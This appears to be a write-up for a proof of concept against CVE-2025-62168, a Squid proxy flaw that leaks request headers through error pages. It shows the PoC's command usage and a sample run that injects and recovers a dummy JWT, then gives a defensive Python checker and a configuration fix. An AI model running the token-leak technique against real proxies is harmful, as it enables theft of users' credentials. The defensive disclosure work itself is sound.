```bash
# active venv
cd ~/CVE-2025-62168
source .venv/bin/activate

# usage
python cve-2025-py
usage: cve-2025-62168.py [-h] [--proxy PROXY] [--verbose]

PoC for CVE-2025-62168 — Squid Proxy token leak via error page header reflection.

options:
  -h, --help     show this help message and exit
  --proxy PROXY  Proxy URL (e.g. http://127.0.0.1:3128)
  --verbose      Enable technical debug output

Example:
  python3 cve-2025-62168.py --proxy http://127.0.0.1:3128 --verbose

[!] Missing required argument: --proxy

# exec
python3 cve-2025-62168.py --proxy http://ip.server:port
python3 cve-2025-62168.py --proxy http://127.0.0.1:3128
------------------------------------------------------------
STEP 1 — Connecting to proxy...
------------------------------------------------------------
Proxy: http://127.0.0.1:3128
------------------------------------------------------------
STEP 2 — Sending request with injected token...
------------------------------------------------------------
Injected Header: X-Test-Leak: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewo...
------------------------------------------------------------
STEP 3 — Server responded, extracting error page...
------------------------------------------------------------
------------------------------------------------------------
STEP 4 — Parsing mailto block from Squid error page...
------------------------------------------------------------
mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_READ_ERROR&body=CacheHost%3A%20poc-linux%0D%0AErrPage%3A%20ERR_READ_ERROR%0D%0AErr%3A%20%5Bnone%5D%0D%0ATimeStamp%3A%20Tue,%2025%20Nov%202025%2014%3A32%3A29%20GMT%0D%0A%0D%0AClientIP%3A%20127.0.0.1%0D%0A%0D%0AHTTP%20Request%3A%0D%0AGET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20krakhen.dev-cve-2025-62168-poc%0D%0AX-Test-Leak%3A%20eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU%0D%0AAccept%3A%20*%2F*%0D%0AAccept-Encoding%3A%20gzip,%20deflate%0D%0AHost%3A%20nonexistent.krakhen-test.local%0D%0A%0D%0A%0D%0A
------------------------------------------------------------
STEP 5 — TOKEN LEAK CONFIRMED
------------------------------------------------------------
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.ewogICJzdWIiOiAiMTIzNDU2Nzg5MCIsCiAgIm5hbWUiOiAia3Jha2hlbi5kZXYiLAogICJhZG1pbiI6IHRydWUsCiAgImlhdCI6IDE1MTYyMzkwMjIKfQo.LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU
------------------------------------------------------------
STEP 6 — Decoding JWT token...
------------------------------------------------------------
Header:
{
  "alg": "HS256",
  "typ": "JWT"
}
Payload:
{
  "sub": "1234567890",
  "name": "krakhen.dev",
  "admin": true,
  "iat": 1516239022
}
Signature:
LspWRdaIXcXllUuABCsYXRqBoKseG5vlb_YIW259aiU
------------------------------------------------------------
DONE — PoC completed successfully.
------------------------------------------------------------
```
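A defender-side check for the reflection shown in the run above, as an added example that is not part of the PoC: it parses a saved Squid error page, decodes the mailto link and reports which credential-like request headers were echoed, with values redacted. The function names, the `SENSITIVE` header list and both sample pages are assumptions constructed for this example.

```python
import re
from html import unescape
from urllib.parse import unquote

# Assumed list of credential-bearing header names; extend for your environment.
SENSITIVE = {"authorization", "proxy-authorization", "cookie", "x-api-key"}
JWT_RE = re.compile(r"eyJ[\w-]+\.[\w-]+\.[\w-]+")  # three base64url segments
HEADER_RE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")

def reflected_headers(error_page_html):
    """Return request headers echoed in the page's mailto body as {name: value}."""
    link = re.search(r'href="(mailto:[^"]+)"', error_page_html, re.I)
    if not link:
        return {}
    body = unquote(unescape(link.group(1)))
    _, found, request = body.partition("HTTP Request:")
    if not found:
        return {}  # no request dump in the link, so nothing is reflected
    headers = {}
    for line in request.splitlines():  # handles both CRLF and bare LF
        m = HEADER_RE.match(line)      # the request line itself does not match
        if m:
            headers[m.group(1)] = m.group(2)
    return headers

def audit(error_page_html):
    """List (header, reason, redacted value) for each reflected secret."""
    findings = []
    for name, value in reflected_headers(error_page_html).items():
        if name.lower() in SENSITIVE:
            reason = "credential header"
        elif JWT_RE.search(value):
            reason = "JWT-shaped value"
        else:
            continue
        findings.append((name, reason, f"{value[:4]}... ({len(value)} chars)"))
    return findings

# Constructed sample pages (not captured from a real proxy).
LEAKY = ('<a href="mailto:webmaster?subject=CacheErrorInfo%20-%20ERR_READ_ERROR'
         '&amp;body=CacheHost%3A%20proxy%0D%0AHTTP%20Request%3A%0D%0A'
         'GET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20audit%0D%0A'
         'X-Test-Leak%3A%20eyJhbGciOiJub25lIn0.eyJzdWIiOiJkZW1vIn0.c2ln%0D%0A'
         'Cookie%3A%20sid%3Dabc123%0D%0AHost%3A%20example.invalid%0D%0A">webmaster</a>')
CLEAN = '<a href="mailto:webmaster?subject=CacheErrorInfo">webmaster</a>'

if __name__ == "__main__":
    for page in (LEAKY, CLEAN):
        print(audit(page) or "no reflected secrets")
```

After setting `email_err_data off` in squid.conf, the mailto link should carry no request dump, and `audit()` should return an empty list for a freshly captured error page.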